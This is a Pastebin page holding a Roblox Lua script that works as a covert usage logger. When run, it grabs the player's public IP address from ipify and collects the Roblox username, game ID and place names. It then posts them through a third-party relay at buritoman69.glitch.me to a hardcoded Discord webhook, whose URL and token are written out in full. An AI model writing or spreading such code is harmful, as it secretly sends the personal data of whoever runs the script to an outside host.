Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local webhook = "https://discord.com/api/webhooks/1274816003687186490/Wh1uTxzVwJPlGf55erQvbloDWUswJh2HwApfK7AQvpsxIhqkdgIRuAPUYzpoXQct-Ofq"
- -- Webhook Above
- local api = "https://api.ipify.org"
- local message = "`".." Script Has Been Used: ~ "..game:HttpGet(api, true).. "`"
- local pages = game:GetService("AssetService"):GetGamePlacesAsync()
- for _,place in pairs(pages:GetCurrentPage()) do
- local message3 = "Place Name Is: ".. place.Name
- local message2 = "`".."The game id is: "..game.PlaceId.."`".." + roblox username: ".. game:GetService("Players").LocalPlayer.Name
- local botname = "Logs" -- Name Here!
- local HttpService = game:GetService("HttpService");
- function specials(Webhook, Message, Botname)
- local Name;
- local start = game:HttpGet("http://buritoman69.glitch.me");
- local biggie = "http://buritoman69.glitch.me/webhook";
- if (not Message or Message == "" or not Botname) then
- Name = "GameBot"
- return error("nil or empty message!")
- else
- Name = Botname;
- end
- local Body = {
- ['Key'] = tostring("applesaregood"),
- ['Message'] = tostring(Message),
- ['Name'] = Name,
- ['Webhook'] = Webhook
- }
- Body = HttpService:JSONEncode(Body);
- local Data = game:HttpPost(biggie, Body, false, "application/json")
- return Data or nil;
- end
- specials(webhook, message, botname)
- specials(webhook, message2, botname)
- specials(webhook, message3, botname)
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement